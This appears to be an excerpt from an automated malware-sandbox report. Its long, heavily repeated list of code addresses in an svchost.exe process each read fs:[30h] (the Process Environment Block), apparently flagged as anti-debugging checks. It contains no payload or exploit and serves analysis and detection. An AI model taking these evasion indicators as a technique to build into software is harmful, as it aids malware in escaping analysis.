Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D8350 mov ecx, dword ptr fs:[00000030h]	2_2_031D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]	2_2_031B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D437C mov eax, dword ptr fs:[00000030h]	2_2_031D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320634F mov eax, dword ptr fs:[00000030h]	2_2_0320634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]	2_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]	2_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]	2_2_03128397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]	2_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]	2_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]	2_2_0312E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]	2_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]	2_2_0315438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]	2_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]	2_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]	2_2_031DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h]	2_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h]	2_2_031D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EC3CD mov eax, dword ptr fs:[00000030h]	2_2_031EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0313A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]	2_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]	2_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]	2_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]	2_2_031383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0314E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031663FF mov eax, dword ptr fs:[00000030h]	2_2_031663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]	2_2_031403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312823B mov eax, dword ptr fs:[00000030h]	2_2_0312823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312A250 mov eax, dword ptr fs:[00000030h]	2_2_0312A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136259 mov eax, dword ptr fs:[00000030h]	2_2_03136259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EA250 mov eax, dword ptr fs:[00000030h]	2_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EA250 mov eax, dword ptr fs:[00000030h]	2_2_031EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B8243 mov eax, dword ptr fs:[00000030h]	2_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B8243 mov ecx, dword ptr fs:[00000030h]	2_2_031B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]	2_2_031E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]	2_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]	2_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]	2_2_03134260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312826B mov eax, dword ptr fs:[00000030h]	2_2_0312826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320625D mov eax, dword ptr fs:[00000030h]	2_2_0320625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]	2_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]	2_2_0316E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]	2_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]	2_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]	2_2_031B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]	2_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]	2_2_031402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]	2_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]	2_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]	2_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]	2_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]	2_2_031C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0313A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]	2_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]	2_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]	2_2_031402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032062D6 mov eax, dword ptr fs:[00000030h]	2_2_032062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DA118 mov ecx, dword ptr fs:[00000030h]	2_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]	2_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]	2_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]	2_2_031DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F0115 mov eax, dword ptr fs:[00000030h]	2_2_031F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]	2_2_031DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03160124 mov eax, dword ptr fs:[00000030h]	2_2_03160124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312C156 mov eax, dword ptr fs:[00000030h]	2_2_0312C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C8158 mov eax, dword ptr fs:[00000030h]	2_2_031C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204164 mov eax, dword ptr fs:[00000030h]	2_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03204164 mov eax, dword ptr fs:[00000030h]	2_2_03204164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]	2_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]	2_2_03136154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]	2_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]	2_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C4144 mov ecx, dword ptr fs:[00000030h]	2_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]	2_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]	2_2_031C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]	2_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]	2_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]	2_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]	2_2_031B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]	2_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]	2_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]	2_2_0312A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03170185 mov eax, dword ptr fs:[00000030h]	2_2_03170185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]	2_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]	2_2_031EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]	2_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]	2_2_031D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032061E5 mov eax, dword ptr fs:[00000030h]	2_2_032061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_031AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]	2_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]	2_2_031F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031601F8 mov eax, dword ptr fs:[00000030h]	2_2_031601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]	2_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]	2_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]	2_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]	2_2_0314E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B4000 mov ecx, dword ptr fs:[00000030h]	2_2_031B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]	2_2_031D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C6030 mov eax, dword ptr fs:[00000030h]	2_2_031C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312A020 mov eax, dword ptr fs:[00000030h]	2_2_0312A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312C020 mov eax, dword ptr fs:[00000030h]	2_2_0312C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03132050 mov eax, dword ptr fs:[00000030h]	2_2_03132050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B6050 mov eax, dword ptr fs:[00000030h]	2_2_031B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0315C073 mov eax, dword ptr fs:[00000030h]	2_2_0315C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313208A mov eax, dword ptr fs:[00000030h]	2_2_0313208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F60B8 mov eax, dword ptr fs:[00000030h]	2_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_031F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031280A0 mov eax, dword ptr fs:[00000030h]	2_2_031280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C80A8 mov eax, dword ptr fs:[00000030h]	2_2_031C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B20DE mov eax, dword ptr fs:[00000030h]	2_2_031B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0312C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031720F0 mov ecx, dword ptr fs:[00000030h]	2_2_031720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0312A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031380E9 mov eax, dword ptr fs:[00000030h]	2_2_031380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B60E0 mov eax, dword ptr fs:[00000030h]	2_2_031B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130710 mov eax, dword ptr fs:[00000030h]	2_2_03130710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03160710 mov eax, dword ptr fs:[00000030h]	2_2_03160710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316C700 mov eax, dword ptr fs:[00000030h]	2_2_0316C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]	2_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316273C mov ecx, dword ptr fs:[00000030h]	2_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]	2_2_0316273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AC730 mov eax, dword ptr fs:[00000030h]	2_2_031AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]	2_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]	2_2_0316C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03130750 mov eax, dword ptr fs:[00000030h]	2_2_03130750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BE75D mov eax, dword ptr fs:[00000030h]	2_2_031BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]	2_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]	2_2_03172750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B4755 mov eax, dword ptr fs:[00000030h]	2_2_031B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316674D mov esi, dword ptr fs:[00000030h]	2_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]	2_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]	2_2_0316674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03138770 mov eax, dword ptr fs:[00000030h]	2_2_03138770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]	2_2_03140770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D678E mov eax, dword ptr fs:[00000030h]	2_2_031D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031307AF mov eax, dword ptr fs:[00000030h]	2_2_031307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031E47A0 mov eax, dword ptr fs:[00000030h]	2_2_031E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0313C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031B07C3 mov eax, dword ptr fs:[00000030h]	2_2_031B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]	2_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]	2_2_031347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]	2_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]	2_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]	2_2_031527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_031BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03172619 mov eax, dword ptr fs:[00000030h]	2_2_03172619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031AE609 mov eax, dword ptr fs:[00000030h]	2_2_031AE609
